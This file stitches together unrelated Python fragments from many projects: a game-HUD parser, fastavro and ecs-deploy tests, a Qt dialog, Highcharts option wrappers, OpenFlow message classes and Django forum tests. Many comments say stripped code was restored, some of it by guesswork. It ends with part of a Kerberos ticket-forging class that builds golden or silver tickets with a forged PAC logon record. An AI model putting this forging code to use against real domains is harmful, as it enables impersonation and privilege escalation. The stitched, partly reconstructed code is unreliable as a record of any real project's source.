        The scoreboard-only fields (loadouts, shields, ultimates, per-agent
        rows) are included only when the scoreboard overlay is detected.
        """
        agents_health = self.health_helper.get_health(frame)
        # Alias side keys: left column is the blue team, right is red.
        agents_health['blue'] = agents_health['left']
        agents_health['red'] = agents_health['right']
        spike_status = self.spike_helper.get_spike_status(frame)
        header_agents = self.header_agent_helper.get_agents(frame)
        header_agents['blue'] = header_agents['left']
        header_agents['red'] = header_agents['right']
        scoreboard_present = self.scoreboard_detector_helper.detect_scoreboard(frame)
        # Debug trace of the scoreboard detector's decision.
        print('ScoreBoardDetector', scoreboard_present)
        if scoreboard_present:
            agents_ultimate_points = self.ultimate_helper.get_ultimate_points(frame)
            shields = self.shield_helper.get_shields(frame)
            loadouts = self.loadout_helper.get_loadouts(frame)
            scoreboard_agents = self.scoreboard_agents_helper.get_agents(frame)
            # Zip the per-row scoreboard data into (agent, loadout, shield, ult) tuples.
            agents_with_loadouts_shields = list(zip(scoreboard_agents['top'], loadouts['top'], shields['top'], agents_ultimate_points['top']))
            return {'score': 'score', 'spike_status': spike_status, 'agents_with_loadouts_shields': agents_with_loadouts_shields, 'alive_agents': header_agents, 'health_values': agents_health}
        return {'score': 'score', 'spike_status': spike_status, 'alive_agents': header_agents, 'health_values': agents_health}
# Fix: restored the "@pytest.mark" prefixes stripped from these decorators
# during extraction (bare ".parametrize"/".skipif" lines are invalid syntax).
@pytest.mark.parametrize('codec', ['snappy', 'zstandard', 'lz4'])
@pytest.mark.skipif(is_testing_cython_modules(), reason='difficult to monkeypatch builtins on cython compiled code')
@pytest.mark.skipif((os.name == 'nt'), reason='A pain to install codecs on windows')
def test_optional_codecs_not_installed_reading(monkeypatch, codec):
    """Reading a file written with an optional codec must raise a helpful
    ValueError when the codec's package cannot be imported."""
    schema = {'doc': 'A weather reading.', 'name': 'Weather', 'namespace': 'test', 'type': 'record', 'fields': [{'name': 'station', 'type': 'string'}, {'name': 'time', 'type': 'long'}, {'name': 'temp', 'type': 'int'}]}
    # Fix: the 'time' integer literals were stripped in extraction; restored
    # the canonical fastavro weather-test timestamps -- the exact values are
    # irrelevant here, the test only exercises codec import handling.
    records = [{'station': '011990-99999', 'temp': 0, 'time': 1433269388}, {'station': '011990-99999', 'temp': 22, 'time': 1433270389}, {'station': '011990-99999', 'temp': (- 11), 'time': 1433273379}, {'station': '012650-99999', 'temp': 111, 'time': 1433275478}]
    file = BytesIO()
    fastavro.writer(file, schema, records, codec=codec)
    file.seek(0)
    orig_import = __import__
    imports = {'snappy', 'zstandard', 'lz4.block', 'cramjam'}
    def import_blocker(name, *args, **kwargs):
        # Simulate the codec packages being uninstalled.
        if (name in imports):
            raise ImportError()
        else:
            return orig_import(name, *args, **kwargs)
    with monkeypatch.context() as ctx:
        ctx.setattr(builtins, '__import__', import_blocker)
        for name in imports:
            ctx.delitem(sys.modules, name, raising=False)
        # Reload so module-level codec imports run under the blocker.
        reload(fastavro._read_py)
        with pytest.raises(ValueError, match=f'{codec} codec is supported but you need to install'):
            list(fastavro.reader(file))
    # Restore the module with real imports for subsequent tests.
    reload(fastavro._read_py)
class Ui_WifiDialog(object):
    """pyuic-style generated UI: a Wi-Fi connection dialog with address/port
    line edits and Clear/Submit buttons inside a group box."""

    def setupUi(self, Dialog):
        """Build the widget tree and layouts for `Dialog`."""
        Dialog.setObjectName('Dialog')
        Dialog.resize(372, 212)
        self.gridLayout_2 = QtWidgets.QGridLayout(Dialog)
        self.gridLayout_2.setObjectName('gridLayout_2')
        self.groupBox = QtWidgets.QGroupBox(Dialog)
        self.groupBox.setObjectName('groupBox')
        self.gridLayout = QtWidgets.QGridLayout(self.groupBox)
        self.gridLayout.setObjectName('gridLayout')
        self.label_3 = QtWidgets.QLabel(self.groupBox)
        self.label_3.setObjectName('label_3')
        self.gridLayout.addWidget(self.label_3, 0, 0, 1, 1)
        self.txtAddress = QtWidgets.QLineEdit(self.groupBox)
        self.txtAddress.setObjectName('txtAddress')
        self.gridLayout.addWidget(self.txtAddress, 0, 1, 1, 2)
        self.label_4 = QtWidgets.QLabel(self.groupBox)
        self.label_4.setObjectName('label_4')
        self.gridLayout.addWidget(self.label_4, 1, 0, 1, 1)
        self.txtPort = QtWidgets.QLineEdit(self.groupBox)
        self.txtPort.setObjectName('txtPort')
        self.gridLayout.addWidget(self.txtPort, 1, 1, 1, 2)
        self.btnClear = QtWidgets.QPushButton(self.groupBox)
        # Fix: the second QSize argument was lost in extraction; restored to
        # 16777215 (QWIDGETSIZE_MAX) -- the value pyuic emits for "cap width
        # only, leave height unconstrained".
        self.btnClear.setMaximumSize(QtCore.QSize(120, 16777215))
        self.btnClear.setObjectName('btnClear')
        self.gridLayout.addWidget(self.btnClear, 2, 1, 1, 1)
        self.btnSubmit = QtWidgets.QPushButton(self.groupBox)
        # Fix: same stripped-argument repair as btnClear above.
        self.btnSubmit.setMaximumSize(QtCore.QSize(120, 16777215))
        self.btnSubmit.setObjectName('btnSubmit')
        self.gridLayout.addWidget(self.btnSubmit, 2, 2, 1, 1)
        self.gridLayout_2.addWidget(self.groupBox, 0, 0, 1, 1)
        self.retranslateUi(Dialog)
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def retranslateUi(self, Dialog):
        """Apply (translatable) display strings; several are empty in the
        source .ui file and are kept empty here."""
        _translate = QtCore.QCoreApplication.translate
        Dialog.setWindowTitle(_translate('Dialog', ''))
        self.groupBox.setTitle(_translate('Dialog', ''))
        self.label_3.setText(_translate('Dialog', ':'))
        self.label_4.setText(_translate('Dialog', ':'))
        self.txtPort.setText(_translate('Dialog', '6666'))
        self.btnClear.setText(_translate('Dialog', ''))
        self.btnSubmit.setText(_translate('Dialog', ''))
# Fix: restored the "@pytest.mark" prefix stripped from the parametrize
# decorator during extraction (a bare ".parametrize(...)" is invalid syntax).
@pytest.mark.parametrize('test_input,expected', [('2', (2, 0, 0)), ('2+', (3, 0, 0)), ('3', (3, 0, 0)), ('1.2.3', (1, 2, 3)), ('1.2.3-beta', (1, 2, 3))])
def test_python_version_parse(test_input, expected):
    """The [Python] Version field is parsed into a (major, minor, patch)
    3-tuple, with '+' rounding up to the next major version."""
    f = StringIO(('\n    [Core]\n    Name = Config\n    Module = config\n\n    [Python]\n    Version = %s\n    ' % test_input))
    assert (PluginInfo.load_file(f, None).python_version == expected)
class InformationDisplayer(ErsiliaBase):
    """Pretty-prints a model's information card to the terminal, section by
    section, using click styling and emoji shortcodes."""

    def __init__(self, info_data, config_json=None):
        ErsiliaBase.__init__(self, config_json=config_json, credentials_json=None)
        self.info_data = info_data
        self.logger.debug(self.info_data)

    # Fix: restored @staticmethod -- without it every `self._echo(text, ...)`
    # call site below would pass the instance as `text` and raise TypeError.
    @staticmethod
    def _echo(text, **styles):
        """Echo `text` via click, emojizing shortcodes when emoji is available."""
        if (emoji is not None):
            text = emoji.emojize(text)
        return click.echo(click.style(text, **styles))

    def _description_info(self):
        """Title + description section."""
        color = 'blue'
        card = self.info_data['card']
        text = ':rocket: {0}'.format(card['Title']).rstrip(os.linesep)
        self._echo(text, fg=color, bold=True)
        text = '{0}'.format(card['Description']).rstrip(os.linesep)
        self._echo(text, fg=color)
        text = ''
        self._echo(text)

    def _identifiers_info(self):
        """Model identifier + slug section."""
        color = 'green'
        card = self.info_data['card']
        text = ':person_tipping_hand: Identifiers'
        self._echo(text, fg=color, bold=True)
        text = 'Model identifiers: {0}'.format(card['Identifier']).rstrip(os.linesep)
        self._echo(text, fg=color)
        text = 'Slug: {0}'.format(card['Slug']).rstrip(os.linesep)
        self._echo(text, fg=color)
        text = ''
        self._echo(text)

    def _code_info(self):
        """GitHub / S3 location section."""
        color = 'red'
        card = self.info_data['card']
        text = ':nerd_face: Code and parameters'
        self._echo(text, fg=color, bold=True)
        # Fix: this string literal was left unterminated by extraction (the
        # URL was stripped). Reconstructed from the ersilia-os repo layout --
        # TODO(review): confirm the exact URL format against upstream.
        text = 'GitHub: https://github.com/ersilia-os/{0}'.format(card['Identifier'])
        self._echo(text, fg=color)
        if ('S3' in card):
            s = card['S3']
        else:
            s = '-'
        text = 'AWS S3: {0}'.format(s)
        self._echo(text, fg=color)
        text = ''
        self._echo(text)

    def _docker_info(self):
        """Docker Hub + architecture section; best-effort when metadata is
        incomplete."""
        try:
            color = 'blue'
            card = self.info_data['card']
            dockerhub_field = card['DockerHub']
            docker_architecture = card['Docker Architecture']
            text = ':whale: Docker'
            self._echo(text, fg=color, bold=True)
            text = 'Docker Hub: {0}'.format(dockerhub_field)
            self._echo(text, fg=color)
            text = 'Architectures: {0}'.format(','.join(docker_architecture))
            self._echo(text, fg=color)
            text = ''
            self._echo(text)
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # still propagate; missing keys remain a logged warning.
        except Exception:
            self.logger.warning('No metadata for Docker slots')

    def echo(self):
        """Print all information sections in order."""
        self._description_info()
        self._identifiers_info()
        self._code_info()
        self._docker_info()
        # Fix: unterminated literal (URL stripped by extraction); reconstructed
        # with the project homepage -- TODO(review): confirm against upstream.
        text = 'For more information, please visit https://ersilia.io'
        self._echo(text, fg='black')
def make_st_acc_i8_s2_v2(p=st_acc_i8):
    """Derive the st_acc_i8_s2_v2 variant by scheduling st_acc_i8.

    Exo scheduling pipeline: bind the `scale` and `act` values into
    ConfigStore, bubble each config write up past the preceding statements,
    fission it out of the loop nest, record dst_stride, then replace the
    loop body and the config-write prologue with hardware instructions.
    The reorder sequence is order-sensitive; statements are left untouched.
    """
    p = rename(p, 'st_acc_i8_s2_v2')
    # Bind `scale` to a config slot, then hoist its write above the loop body.
    p = bind_config(p, 'scale', ConfigStore, 'scale')
    p = reorder_stmts(p, 'tmp : _ ; ConfigStore.scale = _')
    p = reorder_stmts(p, 'src_tmp = _ ; ConfigStore.scale = _')
    p = reorder_stmts(p, 'src_tmp : _ ; ConfigStore.scale = _')
    p = old_fission_after(p, 'ConfigStore.scale = _', n_lifts=2)
    # Record the destination stride right after the scale write.
    p = write_config(p, p.find('ConfigStore.scale = _').after(), ConfigStore, 'dst_stride', 'stride(dst, 0)')
    # Same dance for the activation flag.
    p = bind_config(p, 'act', ConfigStore, 'act')
    p = reorder_stmts(p, 'clamp(_) ; ConfigStore.act = _')
    p = reorder_stmts(p, 'tmp2 : _ ; ConfigStore.act = _')
    p = reorder_stmts(p, 'acc_scale(_) ; ConfigStore.act = _')
    p = reorder_stmts(p, 'tmp : _ ; ConfigStore.act = _')
    p = reorder_stmts(p, 'src_tmp = _ ; ConfigStore.act = _')
    p = reorder_stmts(p, 'src_tmp : _ ; ConfigStore.act = _')
    p = old_fission_after(p, 'ConfigStore.act = _', n_lifts=2)
    # Swap the loop and the config prologue for their instruction equivalents.
    p = replace(p, 'for i in _:_', do_st_acc_i8)
    p = replace(p, 'ConfigStore.scale = _ ;ConfigStore.dst_stride = _ ;ConfigStore.act = _', config_st_acc_i8)
    return p
class OptionSeriesPieStatesSelect(Options):
    """Highcharts ``series.pie.states.select`` options wrapper.

    NOTE(review): getter/setter pairs share one name; the @property /
    @<name>.setter decorators were almost certainly stripped in extraction.
    Code left byte-identical; confirm against the generator's output.
    """

    def animation(self) -> 'OptionSeriesPieStatesSelectAnimation':
        # Sub-options object for the select-state animation.
        return self._config_sub_data('animation', OptionSeriesPieStatesSelectAnimation)

    def enabled(self):
        # Default: the select state is enabled.
        return self._config_get(True)

    def enabled(self, flag: bool):
        self._config(flag, js_type=False)

    def halo(self) -> 'OptionSeriesPieStatesSelectHalo':
        # Sub-options object for the select-state halo.
        return self._config_sub_data('halo', OptionSeriesPieStatesSelectHalo)

    def lineWidth(self):
        # No default line width.
        return self._config_get(None)

    def lineWidth(self, num: float):
        self._config(num, js_type=False)

    def lineWidthPlus(self):
        # Default line-width increment when selected.
        return self._config_get(1)

    def lineWidthPlus(self, num: float):
        self._config(num, js_type=False)

    def marker(self) -> 'OptionSeriesPieStatesSelectMarker':
        # Sub-options object for the select-state marker.
        return self._config_sub_data('marker', OptionSeriesPieStatesSelectMarker)
class OptionSeriesColumnrangeSonificationContexttracksMappingVolume(Options):
    """Highcharts sonification volume-mapping options
    (``series.columnrange.sonification.contextTracks.mapping.volume``).

    NOTE(review): getter/setter pairs share one name; the @property /
    @<name>.setter decorators were almost certainly stripped in extraction.
    Code left byte-identical; confirm against the generator's output.
    """

    def mapFunction(self):
        # Mapping function (e.g. linear/logarithmic); no default.
        return self._config_get(None)

    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    def mapTo(self):
        # Data property the volume is mapped from; no default.
        return self._config_get(None)

    def mapTo(self, text: str):
        self._config(text, js_type=False)

    def max(self):
        # Upper bound of the mapped range; no default.
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        # Lower bound of the mapped range; no default.
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def within(self):
        # Scope the mapping is computed within; no default.
        return self._config_get(None)

    def within(self, value: Any):
        self._config(value, js_type=False)
def database_docs(request):
    """Render the database documentation page for the bibliothecula schema."""
    exports, extended_exports = sql_statements.get_exports()
    sections = {
        'CORE_SCHEMA': {
            'title': 'The core bibliothecula schema.',
            'caption': '',
            'statements': exports,
        },
        'EXTENDED_SCHEMA': {
            'title': 'Extra useful flair.',
            'caption': 'A list of utility SQL statements for use with the bibliothecula schema.',
            'statements': extended_exports,
        },
    }
    # Two-level table of contents; appendix entries only when present.
    toc = []
    for key, section in sections.items():
        toc.append((1, key, section['title']))
        if len(section['statements']['appendix']) > 0:
            toc.append((2, f'{key}-APPENDIX', f"Appendix {section['title']}"))
    context = {'statements': list(sections.items()), 'toc': toc}
    template = loader.get_template('database_doc.html')
    return HttpResponse(template.render(context, request))
# NOTE(review): this bare string is almost certainly the argument of a
# stripped mock decorator (e.g. @patch('ecs_deploy.cli.get_client'), which
# supplies the `get_client` parameter) -- confirm and restore from upstream.
('ecs_deploy.cli.get_client')
def test_deploy_s3_env_file_with_previous_value(get_client, runner):
    """Deploying with --s3-env-file merges the new env-file ARNs with the
    task definition's existing ones and reports the change."""
    get_client.return_value = EcsTestClient('acces_key', 'secret_key')
    result = runner.invoke(cli.deploy, (CLUSTER_NAME, SERVICE_NAME, '--s3-env-file', 'webserver', 'arn:aws:s3:::centerfun/.env', '--s3-env-file', 'webserver', 'arn:aws:s3:::stormzone/.env'))
    assert (result.exit_code == 0)
    assert (not result.exception)
    assert (u'Deploying based on task definition: test-task:1' in result.output)
    assert (u'Updating task definition' in result.output)
    # Bug fix: this assertion was a bare string literal (always truthy and
    # therefore never failing); it must check membership in the output like
    # its siblings.
    assert (u'Changed environmentFiles of container "webserver" to: "{\'arn:aws:s3:::stormzone/.env\', \'arn:aws:s3:::coolBuckets/dev/.env\', \'arn:aws:s3:::myS3bucket/myApp/.env\', \'arn:aws:s3:::centerfun/.env\'}" (was: "{\'arn:aws:s3:::coolBuckets/dev/.env\', \'arn:aws:s3:::myS3bucket/myApp/.env\'}")' in result.output)
    assert (u'Successfully created revision: 2' in result.output)
    assert (u'Successfully deregistered revision: 1' in result.output)
    assert (u'Successfully changed task definition to: test-task:2' in result.output)
    assert (u'Deployment successful' in result.output)
class aggregate_stats_reply(stats_reply):
    """OpenFlow aggregate-stats reply message (loxigen-style generated code).

    NOTE: pack() joins str chunks -- Python 2 bytes model; unpack() takes
    `reader` with no self/cls (loxigen normally emits @staticmethod, which
    was probably stripped in extraction). Code left byte-identical.
    """
    version = 6
    type = 19
    stats_type = 2

    def __init__(self, xid=None, flags=None, stats=None):
        if (xid != None):
            self.xid = xid
        else:
            self.xid = None
        if (flags != None):
            self.flags = flags
        else:
            self.flags = 0
        if (stats != None):
            self.stats = stats
        else:
            self.stats = ofp.stat()
        return

    def pack(self):
        """Serialise to wire format; the length field (index 2) is back-patched
        once the total size is known."""
        packed = []
        packed.append(struct.pack('!B', self.version))
        packed.append(struct.pack('!B', self.type))
        packed.append(struct.pack('!H', 0))
        packed.append(struct.pack('!L', self.xid))
        packed.append(struct.pack('!H', self.stats_type))
        packed.append(struct.pack('!H', self.flags))
        # 4 bytes of padding per the wire format.
        packed.append(('\x00' * 4))
        packed.append(self.stats.pack())
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack('!H', length)
        return ''.join(packed)

    def unpack(reader):
        """Deserialise from a reader; asserts the fixed header fields match
        this message type and bounds the reader to the declared length."""
        obj = aggregate_stats_reply()
        _version = reader.read('!B')[0]
        assert (_version == 6)
        _type = reader.read('!B')[0]
        assert (_type == 19)
        _length = reader.read('!H')[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read('!L')[0]
        _stats_type = reader.read('!H')[0]
        assert (_stats_type == 2)
        obj.flags = reader.read('!H')[0]
        # Skip the 4 padding bytes.
        reader.skip(4)
        obj.stats = ofp.stat.unpack(reader)
        return obj

    def __eq__(self, other):
        # Field-wise equality on the non-constant fields.
        if (type(self) != type(other)):
            return False
        if (self.xid != other.xid):
            return False
        if (self.flags != other.flags):
            return False
        if (self.stats != other.stats):
            return False
        return True

    def pretty_print(self, q):
        """Write a human-readable rendering to pretty-printer `q`."""
        q.text('aggregate_stats_reply {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('xid = ')
                if (self.xid != None):
                    q.text(('%#x' % self.xid))
                else:
                    q.text('None')
                q.text(',')
                q.breakable()
                q.text('flags = ')
                value_name_map = {1: 'OFPSF_REPLY_MORE'}
                q.text(util.pretty_flags(self.flags, value_name_map.values()))
                q.text(',')
                q.breakable()
                q.text('stats = ')
                q.pp(self.stats)
            q.breakable()
        q.text('}')
class socket(bsn_tlv):
    """BSN "socket" TLV (type 212) carrying a single 32-bit value
    (loxigen-style generated code).

    NOTE: pack() joins str chunks -- Python 2 bytes model; unpack() takes
    `reader` with no self/cls (loxigen normally emits @staticmethod, which
    was probably stripped in extraction). Code left byte-identical.
    """
    type = 212

    def __init__(self, value=None):
        if (value != None):
            self.value = value
        else:
            self.value = 0
        return

    def pack(self):
        """Serialise to wire format; the length field (index 1) is back-patched
        once the total size is known."""
        packed = []
        packed.append(struct.pack('!H', self.type))
        packed.append(struct.pack('!H', 0))
        packed.append(struct.pack('!L', self.value))
        length = sum([len(x) for x in packed])
        packed[1] = struct.pack('!H', length)
        return ''.join(packed)

    def unpack(reader):
        """Deserialise from a reader; asserts the TLV type and bounds the
        reader to the declared length."""
        obj = socket()
        _type = reader.read('!H')[0]
        assert (_type == 212)
        _length = reader.read('!H')[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.value = reader.read('!L')[0]
        return obj

    def __eq__(self, other):
        if (type(self) != type(other)):
            return False
        if (self.value != other.value):
            return False
        return True

    def pretty_print(self, q):
        """Write a human-readable rendering to pretty-printer `q`."""
        q.text('socket {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('value = ')
                q.text(('%#x' % self.value))
            q.breakable()
        q.text('}')
class TestMarkForumsReadView(BaseClientTestCase):
    """Views marking whole forums (all, or a category's sub-forums) as read."""

    # Fix: the bare "(autouse=True)" line was the argument list of a stripped
    # @pytest.fixture decorator (invalid syntax as emitted) -- the standard
    # django-machina test-suite pattern.
    @pytest.fixture(autouse=True)
    def setup(self):
        """Build a two-category forum tree with read-tracking and permissions
        shared by all tests."""
        self.u1 = UserFactory.create()
        self.u2 = UserFactory.create()
        self.g1 = GroupFactory.create()
        self.u1.groups.add(self.g1)
        self.u2.groups.add(self.g1)
        self.user.groups.add(self.g1)
        self.perm_handler = PermissionHandler()
        self.tracks_handler = TrackingHandler()
        # Category 1 holds forums 1-3 (forum 2 has a child); category 2 holds forum 4.
        self.top_level_cat_1 = create_category_forum()
        self.top_level_cat_2 = create_category_forum()
        self.forum_1 = create_forum(parent=self.top_level_cat_1)
        self.forum_2 = create_forum(parent=self.top_level_cat_1)
        self.forum_2_child_1 = create_forum(parent=self.forum_2)
        self.forum_3 = create_forum(parent=self.top_level_cat_1)
        self.forum_4 = create_forum(parent=self.top_level_cat_2)
        self.topic = create_topic(forum=self.forum_2, poster=self.u1)
        PostFactory.create(topic=self.topic, poster=self.u1)
        ForumReadTrackFactory.create(forum=self.forum_2, user=self.u2)
        ForumReadTrackFactory.create(forum=self.forum_2, user=self.user)
        # Note: forum_3 deliberately gets no read permission.
        assign_perm('can_read_forum', self.g1, self.top_level_cat_1)
        assign_perm('can_read_forum', self.g1, self.top_level_cat_2)
        assign_perm('can_read_forum', self.g1, self.forum_1)
        assign_perm('can_read_forum', self.g1, self.forum_2)
        assign_perm('can_read_forum', self.g1, self.forum_2_child_1)
        assign_perm('can_read_forum', self.g1, self.forum_4)

    def test_browsing_works(self):
        """Both mark-read views respond 200 to a GET."""
        correct_url_1 = reverse('forum_tracking:mark_all_forums_read')
        correct_url_2 = reverse('forum_tracking:mark_subforums_read', kwargs={'pk': self.top_level_cat_1.pk})
        response_1 = self.client.get(correct_url_1, follow=True)
        response_2 = self.client.get(correct_url_2, follow=True)
        assert (response_1.status_code == 200)
        assert (response_2.status_code == 200)

    def test_can_mark_all_readable_forums_read(self):
        """POSTing mark-all leaves the user with no unread forums."""
        new_topic = create_topic(forum=self.forum_2, poster=self.u1)
        PostFactory.create(topic=new_topic, poster=self.u1)
        correct_url = reverse('forum_tracking:mark_all_forums_read')
        response = self.client.post(correct_url, follow=True)
        assert (response.status_code == 200)
        assert (list(self.tracks_handler.get_unread_forums(self.user)) == [])

    def test_can_mark_subforums_read(self):
        """Marking category 1's sub-forums read leaves only category 2's
        branch (with its new topic) unread."""
        new_topic = create_topic(forum=self.forum_2, poster=self.u1)
        PostFactory.create(topic=new_topic, poster=self.u1)
        new_topic = create_topic(forum=self.forum_4, poster=self.u1)
        PostFactory.create(topic=new_topic, poster=self.u1)
        correct_url = reverse('forum_tracking:mark_subforums_read', kwargs={'pk': self.top_level_cat_1.pk})
        response = self.client.post(correct_url, follow=True)
        assert (response.status_code == 200)
        assert (set(self.tracks_handler.get_unread_forums(self.user)) == set([self.top_level_cat_2, self.forum_4]))
class Integer(Integer32):
    """Integer32 variant whose named-values set can be extended.

    NOTE(review): withNamedValues takes `cls` but carries no @classmethod
    decorator here -- likely stripped in extraction (upstream defines it as
    a classmethod). Code left byte-identical.
    """

    def withNamedValues(cls, **values):
        """Return a subclass with `values` merged into the named values and
        the value set constrained to the newly supplied values."""
        enums = set(cls.namedValues.items())
        enums.update(values.items())
        class X(cls):
            namedValues = namedval.NamedValues(*enums)
            subtypeSpec = (cls.subtypeSpec + constraint.SingleValueConstraint(*values.values()))
        # Keep the original class name for reprs/debugging.
        X.__name__ = cls.__name__
        return X
class OptionSeriesPyramidSonificationDefaultinstrumentoptionsMapping(Options):
    """Highcharts sonification instrument-mapping options
    (``series.pyramid.sonification.defaultInstrumentOptions.mapping``).

    Every accessor returns the lazily-created sub-options object for that
    audio parameter. NOTE(review): these are likely @property accessors with
    the decorators stripped in extraction; code left byte-identical.
    """

    def frequency(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingFrequency':
        return self._config_sub_data('frequency', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingFrequency)

    def gapBetweenNotes(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingGapbetweennotes':
        return self._config_sub_data('gapBetweenNotes', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingGapbetweennotes)

    def highpass(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingHighpass':
        return self._config_sub_data('highpass', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingHighpass)

    def lowpass(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingLowpass':
        return self._config_sub_data('lowpass', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingLowpass)

    def noteDuration(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingNoteduration':
        return self._config_sub_data('noteDuration', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingNoteduration)

    def pan(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingPan':
        return self._config_sub_data('pan', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingPan)

    def pitch(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingPitch':
        return self._config_sub_data('pitch', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingPitch)

    def playDelay(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingPlaydelay':
        return self._config_sub_data('playDelay', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingPlaydelay)

    def time(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingTime':
        return self._config_sub_data('time', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingTime)

    def tremolo(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingTremolo':
        return self._config_sub_data('tremolo', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingTremolo)

    def volume(self) -> 'OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingVolume':
        return self._config_sub_data('volume', OptionSeriesPyramidSonificationDefaultinstrumentoptionsMappingVolume)
class FadingDurationPreference(widgets.SpinPreference, widgets.CheckConditional):
    """Spin-button preference for the desktop-cover fading duration.

    The spin control is only active while the preference named by
    ``condition_preference_name`` (the 'fading' checkbox) is enabled.
    """
    # Default fading duration value shown in the spin button.
    default = 50
    # Settings key backing this preference.
    name = 'plugin/desktopcover/fading_duration'
    # Checkbox preference this control is conditional on.
    condition_preference_name = 'plugin/desktopcover/fading'
    def __init__(self, preferences, widget):
        # Initialise both mixins explicitly; SpinPreference wires the widget,
        # CheckConditional hooks the enable/disable behaviour.
        widgets.SpinPreference.__init__(self, preferences, widget)
        widgets.CheckConditional.__init__(self)
class TICKETER():
def __init__(self, target, password, domain, options):
    """Store the ticket-forging parameters and derive service/server from the SPN.

    Without an SPN a golden ticket is prepared (service ``krbtgt`` for the
    target domain); with one, a silver ticket for ``service/server``.
    """
    self.__password = password
    self.__target = target
    self.__domain = domain
    self.__options = options
    self.__tgt = None
    self.__tgt_session_key = None
    if not options.spn:
        # No SPN given: forge a TGT for the krbtgt service of the domain.
        self.__service = 'krbtgt'
        self.__server = self.__domain
    else:
        spn_parts = options.spn.split('/')
        self.__service = spn_parts[0]
        self.__server = spn_parts[1]
        if options.keytab is not None:
            self.loadKeysFromKeytab(options.keytab)
@staticmethod
def getFileTime(t):
    """Convert a Unix epoch timestamp to a Windows FILETIME value.

    FILETIME counts 100-nanosecond intervals since January 1, 1601 (UTC).
    Declared @staticmethod because callers invoke it as ``self.getFileTime(t)``
    with a single argument; the multiplier/offset constants were missing in
    the original (syntax error).
    """
    t *= 10000000
    t += 116444736000000000
    return t
@staticmethod
def getPadLength(data_length):
    """Return the number of padding bytes needed to round data_length up to a multiple of 8.

    Declared @staticmethod: callers invoke it as ``self.getPadLength(n)`` with
    one argument, which would fail for a plain in-class function.
    """
    return ((data_length + 7) // 8) * 8 - data_length
@staticmethod
def getBlockLength(data_length):
    """Return data_length rounded up to the next multiple of 8 bytes.

    Declared @staticmethod: callers invoke it as ``self.getBlockLength(n)``
    with one argument, which would fail for a plain in-class function.
    """
    return ((data_length + 7) // 8) * 8
def loadKeysFromKeytab(self, filename):
    """Load the SPN's key from a keytab file into the global options.

    Looks up the principal "<SPN>@<REALM>" (upper-cased, the form keytabs
    store); AES keys populate ``options.aesKey`` and RC4 keys populate
    ``options.nthash``. The original format string ``'%%s' % (spn, domain)``
    raised TypeError (one conversion, two arguments) — restored to the
    SPN@REALM form.
    """
    keytab = Keytab.loadFile(filename)
    keyblock = keytab.getKey('%s@%s' % (options.spn.upper(), self.__domain.upper()))
    if keyblock:
        if keyblock['keytype'] == Enctype.AES256 or keyblock['keytype'] == Enctype.AES128:
            options.aesKey = keyblock.hexlifiedValue()
        elif keyblock['keytype'] == Enctype.RC4:
            options.nthash = keyblock.hexlifiedValue()
    else:
        logging.warning("No matching key for SPN '%s' in given keytab found!", options.spn)
def createBasicValidationInfo(self):
    """Build a KERB_VALIDATION_INFO (PAC_LOGON_INFO buffer) for the forged identity.

    Logon/password-set times are the current time as a FILETIME split into
    low/high dwords; logoff, kickoff and password-must-change are set to
    "never" (INT64 max, 0x7FFFFFFFFFFFFFFF). Groups, user RID and domain SID
    come from the command-line options. The dword masks/constants were
    stripped in the original (syntax errors) and are restored here.

    Returns a populated VALIDATION_INFO wrapper.
    """
    kerbdata = KERB_VALIDATION_INFO()
    aTime = timegm(datetime.datetime.utcnow().timetuple())
    unixTime = self.getFileTime(aTime)
    kerbdata['LogonTime']['dwLowDateTime'] = unixTime & 0xFFFFFFFF
    kerbdata['LogonTime']['dwHighDateTime'] = unixTime >> 32
    # "Never": INT64_MAX split into low/high dwords.
    kerbdata['LogoffTime']['dwLowDateTime'] = 0xFFFFFFFF
    kerbdata['LogoffTime']['dwHighDateTime'] = 0x7FFFFFFF
    kerbdata['KickOffTime']['dwLowDateTime'] = 0xFFFFFFFF
    kerbdata['KickOffTime']['dwHighDateTime'] = 0x7FFFFFFF
    kerbdata['PasswordLastSet']['dwLowDateTime'] = unixTime & 0xFFFFFFFF
    kerbdata['PasswordLastSet']['dwHighDateTime'] = unixTime >> 32
    kerbdata['PasswordCanChange']['dwLowDateTime'] = 0
    kerbdata['PasswordCanChange']['dwHighDateTime'] = 0
    kerbdata['PasswordMustChange']['dwLowDateTime'] = 0xFFFFFFFF
    kerbdata['PasswordMustChange']['dwHighDateTime'] = 0x7FFFFFFF
    kerbdata['EffectiveName'] = self.__target
    kerbdata['FullName'] = ''
    kerbdata['LogonScript'] = ''
    kerbdata['ProfilePath'] = ''
    kerbdata['HomeDirectory'] = ''
